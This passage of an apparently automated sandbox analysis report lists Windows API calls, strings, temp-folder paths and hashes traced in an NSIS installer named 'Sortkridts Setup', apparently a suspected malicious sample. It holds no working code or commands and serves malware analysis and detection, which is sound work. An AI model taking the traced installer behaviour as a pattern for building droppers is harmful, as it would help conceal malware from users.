                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                • String ID:
                                • API String ID: 4216380887-0
                                • Opcode ID: 92e1fde204657cc7566e59c786db025e89232e2a9abec962dfef11d09d6291b0
                                • Instruction ID: dbd967a39b47cf024701162afdf7449ab04ad02ccd850dcad13909bbe0ce6983
                                • Opcode Fuzzy Hash: 92e1fde204657cc7566e59c786db025e89232e2a9abec962dfef11d09d6291b0
                                • Instruction Fuzzy Hash: C1412773D05726EFCB149F28CA54AE977B8FB063D0B40023EEA48DA144F7716954CAE0
                                APIs
                                • GetDlgItem.USER32(?,?), ref: 00401F03
                                • GetClientRect.USER32(00000000,?), ref: 00401F4D
                                • LoadImageW.USER32(00000000,?,00000100,?,?,00000100), ref: 00401F82
                                • SendMessageW.USER32(00000000,00000172,00000100,00000000), ref: 00401F92
                                • DeleteObject.GDI32(00000000), ref: 00401FA1
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                • String ID:
                                • API String ID: 1849352358-0
                                • Opcode ID: 7f9423f384d93fc0e3e6fbc7cac958838f77b0a9d1a07732a5146b80b1a3c62d
                                • Instruction ID: a1357e6e01c620789306e575287b66343fc6a42a857d7aaea03cc6a10a526d0d
                                • Opcode Fuzzy Hash: 7f9423f384d93fc0e3e6fbc7cac958838f77b0a9d1a07732a5146b80b1a3c62d
                                • Instruction Fuzzy Hash: 1C21B6726093029FD340DF64DE84A6BB7E8EB88304F04093EF985E62A1D778D840DB59
                                APIs
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000808,00000000,6FC32B4C,00000000,00000808), ref: 6FC31F8C
                                • GlobalAlloc.KERNEL32(00000040,00000000), ref: 6FC31F97
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6FC31FAB
                                • GetProcAddress.KERNEL32(?,00000000), ref: 6FC31FB6
                                • GlobalFree.KERNEL32(00000000), ref: 6FC31FBF
                                Memory Dump Source
                                • Source File: 00000002.00000002.20001269089.000000006FC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6FC30000, based on PE: true
                                 • Associated: 00000002.00000002.20001233361.000000006FC30000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000002.00000002.20001307380.000000006FC34000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000002.00000002.20001344547.000000006FC36000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_6fc30000_temp_executable.jbxd
                                Similarity
                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                • String ID:
                                • API String ID: 1148316912-0
                                • Opcode ID: ef712a2423256fb01bb0461b7c77f082ba2ddbb04054309ace3c51f7cecdb2e6
                                • Instruction ID: d9ac6cc4d7fdc0a6fefb43e28a0fab36886da1966a9082666a362b19cda00f7b
                                • Opcode Fuzzy Hash: ef712a2423256fb01bb0461b7c77f082ba2ddbb04054309ace3c51f7cecdb2e6
                                • Instruction Fuzzy Hash: DAF0C033208519BBCA201AE7DC0CD97BE7DFB8B6FAB160215F719D11A0C56368108771
                                APIs
                                • lstrlenW.KERNEL32(004211D0,%u.%u%s%s,?,00000000,00000000,?,000000DC,00000000,?,000000DF,004211D0,?,?,?,?,?), ref: 004055FA
                                • wsprintfW.USER32 ref: 00405607
                                • SetDlgItemTextW.USER32(?,004211D0), ref: 0040561E
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: ItemTextlstrlenwsprintf
                                • String ID: %u.%u%s%s
                                • API String ID: 3540041739-3551169577
                                • Opcode ID: 1657763a395a501c771c527054f82eb2be7fb15598214c574ca57117f0c03a97
                                • Instruction ID: 55cf9957bdbe08eeb8051450228c2b429c3200e40720c4f5a9b0f695fa8f14cf
                                • Opcode Fuzzy Hash: 1657763a395a501c771c527054f82eb2be7fb15598214c574ca57117f0c03a97
                                • Instruction Fuzzy Hash: 902106737003142FD720A9799C81FAB7289CBC5364F01473EFE6AF71D1E979581885A5
                                APIs
                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,?,?,?), ref: 00401E2C
                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00401E48
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: MessageSend$Timeout
                                • String ID: !
                                • API String ID: 1777923405-2657877971
                                • Opcode ID: 717c05464dbdde1d43877d7e05f7376ad78b7270f4b2221d83dfb1c24934849a
                                • Instruction ID: 49af8de353e46cf11236f791407a5cbcba9ae5af57995df827a2b81b7b260957
                                • Opcode Fuzzy Hash: 717c05464dbdde1d43877d7e05f7376ad78b7270f4b2221d83dfb1c24934849a
                                • Instruction Fuzzy Hash: 44212471209301AFE714AF21C846A2FBBE8EF84755F00093FF585A21E0C6B98D01CA5A
                                APIs
                                • wsprintfW.USER32 ref: 6FC31F51
                                • lstrcpyW.KERNEL32(?,error,00001018,6FC31765,00000000,?), ref: 6FC31F71
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.20001269089.000000006FC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6FC30000, based on PE: true
                                 • Associated: 00000002.00000002.20001233361.000000006FC30000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000002.00000002.20001307380.000000006FC34000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000002.00000002.20001344547.000000006FC36000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_6fc30000_temp_executable.jbxd
                                Similarity
                                • API ID: lstrcpywsprintf
                                • String ID: callback%d$error
                                • API String ID: 2408954437-1307476583
                                • Opcode ID: 8f683150b883aa23e48894f463d90198684e0149c8f81b6ddfc0e009bda34a50
                                • Instruction ID: 5ed1d06a84ed2bc492cc0ad4c1f9e85869cc7e836f9621b2fa861347f44ed627
                                • Opcode Fuzzy Hash: 8f683150b883aa23e48894f463d90198684e0149c8f81b6ddfc0e009bda34a50
                                • Instruction Fuzzy Hash: 96F01C36B04120AFD7088B08D948DBA73A5FF8A390F0585A8F9599B211D775EC548B95
                                APIs
                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403C9E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76073420,0040399D), ref: 00406537
                                • CharPrevW.USER32(?,00000000), ref: 00406542
                                • lstrcatW.KERNEL32(?,004082B0), ref: 00406554
                                Strings
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00406531
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: CharPrevlstrcatlstrlen
                                • String ID: C:\Users\user\AppData\Local\Temp\
                                • API String ID: 2659869361-3355392842
                                • Opcode ID: d05188d841616a9e1b7d59f18f8490afccaafd82e288364c4b54bb9922993767
                                • Instruction ID: cc5554a2ad12a3b2ce5c355aa705355a4eb5105ff62047e1dcc734cc64aad723
                                • Opcode Fuzzy Hash: d05188d841616a9e1b7d59f18f8490afccaafd82e288364c4b54bb9922993767
                                • Instruction Fuzzy Hash: B6D05E31102924AFC2026B58AE08D9B77ACFF46301301406EFAC2B3160CB745D5287ED
                                APIs
                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll), ref: 004028B9
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: lstrlen
                                • String ID: C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp$C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll
                                • API String ID: 1659193697-1643209395
                                • Opcode ID: 8dbcb2fd7b217228523bb32d9577dfde9e670be5aaf231835310540875a17a73
                                • Instruction ID: 87e4a89a1644b821f0af8cb1a7976e90618d12837afc66c1e862d8435416238a
                                • Opcode Fuzzy Hash: 8dbcb2fd7b217228523bb32d9577dfde9e670be5aaf231835310540875a17a73
                                • Instruction Fuzzy Hash: C7112676A543006BD310BB618A89A2BB7D4AF84314F11453FF545B31C1D7BC980687AF
                                APIs
                                  • Part of subcall function 00405D15: lstrlenW.KERNEL32(00424200,?,00000000,?,?), ref: 00405D47
                                  • Part of subcall function 00405D15: lstrlenW.KERNEL32(?,00424200,?,00000000,?,?), ref: 00405D59
                                  • Part of subcall function 00405D15: lstrcatW.KERNEL32(00424200,?,?,00424200,?,00000000,?,?), ref: 00405D74
                                  • Part of subcall function 00405D15: SetWindowTextW.USER32(00424200,00424200), ref: 00405D8C
                                  • Part of subcall function 00405D15: SendMessageW.USER32(00000000), ref: 00405DB3
                                  • Part of subcall function 00405D15: SendMessageW.USER32(00000000,0000104D,00000000,?), ref: 00405DCE
                                  • Part of subcall function 00405D15: SendMessageW.USER32(00000000,00001013,00000000,00000000), ref: 00405DDB
                                  • Part of subcall function 004069CE: ShellExecuteExW.SHELL32(?), ref: 004069DD
                                  • Part of subcall function 004064EF: WaitForSingleObject.KERNEL32(?,00000064), ref: 004064F9
                                  • Part of subcall function 004064EF: GetExitCodeProcess.KERNEL32(?,?), ref: 00406523
                                • CloseHandle.KERNEL32(?,?), ref: 00402110
                                Strings
                                • C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll, xrefs: 00402098
                                • @, xrefs: 004020F2
                                • C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising\Trichoschistic, xrefs: 004020D1
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: MessageSend$lstrlen$CloseCodeExecuteExitHandleObjectProcessShellSingleTextWaitWindowlstrcat
                                • String ID: @$C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising\Trichoschistic$C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll
                                • API String ID: 4079680657-1528140705
                                • Opcode ID: b3f635e0ff2294aada5878f9b4cee8023eac3de101f72fe104a431beeca66540
                                • Instruction ID: 1a2f5228193f18700cea608b7af5492b6fd1c87105d587b586e39d0dc9a83391
                                • Opcode Fuzzy Hash: b3f635e0ff2294aada5878f9b4cee8023eac3de101f72fe104a431beeca66540
                                • Instruction Fuzzy Hash: 3C118C71A483809BC710AFA2C94561ABBE9BFC4745F40493EF595A72D1DBBC8805CB4A
                                APIs
                                • CreateDirectoryW.KERNEL32(00000000,?), ref: 00405E5A
                                • GetLastError.KERNEL32 ref: 00405E64
                                • SetFileSecurityW.ADVAPI32(00000000,80000007,00000001), ref: 00405E7D
                                • GetLastError.KERNEL32 ref: 00405E8B
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                • String ID:
                                • API String ID: 3449924974-0
                                • Opcode ID: c4ec091984c90c0ed15a9be6932df6b8cec91024cb801c9daff41168a069ff59
                                • Instruction ID: 2395f8a8d7837bad9ab877b1c5b4dd478f8f3e4f7c6de220d66e2a00ae86bb09
                                • Opcode Fuzzy Hash: c4ec091984c90c0ed15a9be6932df6b8cec91024cb801c9daff41168a069ff59
                                • Instruction Fuzzy Hash: A201EC75D00609DFDB109FA0DA44BAE7BB4EF14315F10453AD989F2190D7789648CF99
                                APIs
                                • DestroyWindow.USER32(00000000,00403554), ref: 00403375
                                • GetTickCount.KERNEL32 ref: 00403394
                                • CreateDialogParamW.USER32(0000006F,00000000,0040362A,00000000), ref: 004033B3
                                • ShowWindow.USER32(00000000,00000005), ref: 004033C1
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                • String ID:
                                • API String ID: 2102729457-0
                                • Opcode ID: 4a7b031ca6bcbd07d04e4791083f97fcd863d0c0ea14b4434ac483fd79bb7cb0
                                • Instruction ID: 05fd0e373085f508408529d976a5f5643121ad856ee530bb797c10a8200a5ccc
                                • Opcode Fuzzy Hash: 4a7b031ca6bcbd07d04e4791083f97fcd863d0c0ea14b4434ac483fd79bb7cb0
                                • Instruction Fuzzy Hash: 2EF0F870651700EBEB209F60EF8DB1A3AA8B740B06F801979F941B51F0DFB89540CA5C
                                APIs
                                  • Part of subcall function 00406AF5: lstrcpynW.KERNEL32(?,?,00000400,0040384C,Sortkridts Setup,NSIS Error), ref: 00406B02
                                  • Part of subcall function 00406BA0: CharNextW.USER32(?,?,?,00000000,00425A48,0040662A,00425A48,00425A48,00000000,?,?,00406716,?,00000000,76073420,?), ref: 00406BAF
                                  • Part of subcall function 00406BA0: CharNextW.USER32(00000000), ref: 00406BB4
                                  • Part of subcall function 00406BA0: CharNextW.USER32(00000000), ref: 00406BCE
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,76073420,0040399D), ref: 00406D8D
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,?,?,00000000), ref: 00406D9C
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,76073420,0040399D), ref: 00406DA1
                                  • Part of subcall function 00406D18: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,76073420,0040399D), ref: 00406DB9
                                • lstrlenW.KERNEL32(00425A48,00000000,00425A48,00425A48,00000000,?,?,00406716,?,00000000,76073420,?), ref: 00406667
                                • GetFileAttributesW.KERNEL32(00425A48,00425A48), ref: 00406678
                                  • Part of subcall function 004065AA: FindFirstFileW.KERNELBASE(00000000,00427648,00000000,00406657,00425A48), ref: 004065B5
                                  • Part of subcall function 004065AA: FindClose.KERNEL32(00000000), ref: 004065C1
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Char$Next$FileFind$AttributesCloseFirstPrevlstrcpynlstrlen
                                • String ID: HZB
                                • API String ID: 1879705256-1498320904
                                • Opcode ID: 2782f30abaae67d32aad9d2ddd7e042e6b9764b6a7ee77395c88dac23f9c836b
                                • Instruction ID: c1f6674fc9072460158ec6ac158274c55d6247b1d16a8c1a13e9c8cd3e3f7c83
                                • Opcode Fuzzy Hash: 2782f30abaae67d32aad9d2ddd7e042e6b9764b6a7ee77395c88dac23f9c836b
                                • Instruction Fuzzy Hash: 60F0C2715016612AC62033762E89A2B255C8E2136979B4F3FFD97F22D2CA3ECC31956D
                                APIs
                                • IsWindowVisible.USER32(?), ref: 004058DF
                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405927
                                  • Part of subcall function 004054C3: SendMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004054D5
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Window$CallMessageProcSendVisible
                                • String ID:
                                • API String ID: 3748168415-3916222277
                                • Opcode ID: 2dca9501c208de8155b709c61fb4f4fee366092d07c020c7b33c5c4d6728830a
                                • Instruction ID: b1e338e3564b8c01f07b09259678d1708f9cc3666d75656fad75f4110972ebbf
                                • Opcode Fuzzy Hash: 2dca9501c208de8155b709c61fb4f4fee366092d07c020c7b33c5c4d6728830a
                                • Instruction Fuzzy Hash: 5401D472600619EBDF202F01DC04ADB3A25EB94768F004437F904B62E1C77989A29FED
                                APIs
                                • DispatchMessageW.USER32(?), ref: 004061F6
                                • PeekMessageW.USER32(?,00000000,?,T5@,00000001), ref: 0040620A
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Message$DispatchPeek
                                • String ID: T5@
                                • API String ID: 1770753511-1075436632
                                • Opcode ID: 9cb97e42a766ea8cada08b0cc05ec87f5fef8c0c6a112fe8ce1f02b30d5e22d0
                                • Instruction ID: 9faa2b1bfb0e31a5f243467a4896c54f1023d1031c98b050ea5e6b6ce42c350d
                                • Opcode Fuzzy Hash: 9cb97e42a766ea8cada08b0cc05ec87f5fef8c0c6a112fe8ce1f02b30d5e22d0
                                • Instruction Fuzzy Hash: 89D0123190020DA7DF109FE0DD09F9A7B6D6B04744F008035B742A9091D679D1179B99
                                APIs
